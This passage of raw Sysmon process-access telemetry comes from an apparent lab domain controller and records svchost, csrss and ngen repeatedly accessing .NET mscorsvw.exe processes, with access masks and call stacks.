vc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080997Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.403{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2C-607E-0F0F-00000000BB01}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080996Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.403{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC2C-607E-0F0F-00000000BB01}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080995Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.403{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2C-607E-0F0F-00000000BB01}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080994Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.356{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2C-607E-0E0F-00000000BB01}6012C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080993Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.356{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC2C-607E-0E0F-00000000BB01}6012C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080992Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.356{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2C-607E-0E0F-00000000BB01}6012C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080991Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.325{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2C-607E-0D0F-00000000BB01}3480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080990Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.310{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2C-607E-0D0F-00000000BB01}3480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080989Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.310{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2C-607E-0D0F-00000000BB01}3480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080988Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.278{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2C-607E-0C0F-00000000BB01}5932C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080987Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.263{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC2C-607E-0C0F-00000000BB01}5932C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080986Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.263{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2C-607E-0C0F-00000000BB01}5932C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080985Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.231{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2C-607E-0B0F-00000000BB01}3932C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080984Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.216{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC2C-607E-0B0F-00000000BB01}3932C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080983Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.216{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2C-607E-0B0F-00000000BB01}3932C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080982Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.185{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2C-607E-0A0F-00000000BB01}5836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080981Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.169{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2C-607E-0A0F-00000000BB01}5836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080980Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.169{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2C-607E-0A0F-00000000BB01}5836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080979Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.138{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2C-607E-090F-00000000BB01}5856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080978Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.138{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2C-607E-090F-00000000BB01}5856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080977Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.138{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2C-607E-090F-00000000BB01}5856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080976Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.106{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2C-607E-080F-00000000BB01}6512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080975Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.091{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC2C-607E-080F-00000000BB01}6512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080974Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 